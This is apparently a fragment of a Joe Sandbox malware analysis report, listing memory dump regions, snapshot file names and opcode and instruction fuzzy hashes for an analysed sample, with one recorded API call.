                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f7d50cd02db78d561bf84398993b6436f1974efa94ab9c5c8fe34b1c68044834
                                                                                                                • Instruction ID: d9cad8d55ad18b980c9ffd2bb91a9eb837a6e85c18398f82dd81848f416a2f27
                                                                                                                • Opcode Fuzzy Hash: f7d50cd02db78d561bf84398993b6436f1974efa94ab9c5c8fe34b1c68044834
                                                                                                                • Instruction Fuzzy Hash: 33113CB7F516244BF351487ACC843926583ABE9321F2B827889A8573C4ECBD584A5294
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                                • Instruction ID: f4c4f1d5f0d808e3f8bdcc00de2371e74ad2038ed2075f57f57470fabdebeebd
                                                                                                                • Opcode Fuzzy Hash: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                                • Instruction Fuzzy Hash: 2BF08124004B914AD7728F398460773BFE09B13218F141A4DC9D7476E2D36AD00A8788
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                • Instruction ID: 8b7a2b4c166fdb3d48a62bb880509e0509666f4597344d64eaf62b1a72741bf0
                                                                                                                • Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                • Instruction Fuzzy Hash: 52F065105087E28ADB234B3E44706B3AFE09B63120B181BD7C8E19B3C7C3199497C36A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 58e1c988d0910aaceeaed7589889c7ee5d6167aba00e8f21e93a1c52357059d8
                                                                                                                • Instruction ID: 6e2f14d6f604c1223f6c0ad7c5a2d4295570d6d8dcd45acbcd60345435fd7e2b
                                                                                                                • Opcode Fuzzy Hash: 58e1c988d0910aaceeaed7589889c7ee5d6167aba00e8f21e93a1c52357059d8
                                                                                                                • Instruction Fuzzy Hash: 3101F9706442429BD304CF38CCA0577FBA1EB86364F08D79DC4568B796C638D442C799
                                                                                                                APIs
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 004D91DA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                • String ID: +Ku$wpq
                                                                                                                • API String ID: 237503144-1953850642
                                                                                                                • Opcode ID: e57e22106b1e6f7b602839bc294af2e67b6d2b1e29bac09348ef7c60eaab28e9
                                                                                                                • Instruction ID: 642b41c4325348bdadac05aa49dd83172fdd49e297ec924f5ba7a80f746a6e4d
                                                                                                                • Opcode Fuzzy Hash: e57e22106b1e6f7b602839bc294af2e67b6d2b1e29bac09348ef7c60eaab28e9
                                                                                                                • Instruction Fuzzy Hash: 9F51BD7220C3128FC324CF29984076FB7E2EBC5310F15892EE499CB285DB34D50ACB96